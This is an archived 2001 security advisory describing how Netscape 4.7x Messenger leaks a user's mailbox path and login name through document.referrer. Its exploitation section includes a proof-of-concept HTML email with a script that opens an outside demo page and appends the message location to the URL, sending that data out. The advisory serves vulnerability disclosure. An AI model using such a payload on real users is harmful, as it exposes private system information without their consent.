SECURITY.NNOV: Netscape 4.7x Messanger user information retrival

2001-06-05T00:00:00
ID SECURITYVULNS:DOC:1687
Type securityvulns
Reporter Securityvulns
Modified 2001-06-05T00:00:00

Description

There are known bugs in Netscape which require information on user's files location. This bug is not serious one, but it allows to get this location.

Topic : Netscape 4.7x user information retrival Author : 3APA3A <3APA3A@security.nnov.ru> Affected software : Netscape 4.7x All Platforms Vendor : Netscape (IPlanet) Risk : Low Remotely Exploitable : Yes Released : 30 May 2001 Vendor URL : http://www.netscape.com SECURITY.NNOV advisories: http://www.security.nnov.ru/advisories

Background:

Netscape Messanger uses internal protocol called mailbox://. The format of mailbox URI is

mailbox://full_path_to_user_folder?ID=some_message_d&number=somenumber

this URI contains full path to user's mailbox which usually contains user's login name and in case of Windows 9x - the path to Netscape installation. It's impossible to determine this location from javascript inside e-mail message, because Netscape hides document.location from javascript.

Problem:

It's possible to retrieve mailbox:// URI of the message. E.g., it's possible to retrieve mailbox location, user's system login and in some cases path to Netscape installation.

Details:

When link invoked from message, Netscape sets "document.referrer" property to URI of the message contained this link. Javascript on the target page is able to retrieve this property and pass it to any location together with IP of calling machine.

Exploitation:

If you read this message with Netscape Messanger you can simply click reference http://www.security.nnov.ru/files/nsdemo.asp to see your mailbox location or you can force Netscape user to open this page with message like this:

-=-=-=-=-=-=-=-=-=- From: 3APA3A To: 3APA3A Subject: Test your Netscape Content-Type: text/html

<html><script> window.open('http://www.security.nnov.ru/files/nsdemo.asp?'+escape(document.location)); </script> <A HREF="http://www.security.nnov.ru/files/nsdemo.asp" > http://www.security.nnov.ru/files/nsdemo.asp </A> </html> -=-=-=-=-=-=-=-=-=-

Vendor:

Netscape was contacted May, 30 2001 via http://help.netscape.com/forms/bug-security.html No feedback were given.

-- http://www.security.nnov.ru /\_/\ { . . } |\ +--oQQo->{ ^ }<-----+ \ | 3APA3A U 3APA3A } +-------------o66o--+ / |/ You know my name - look up my number (The Beatles)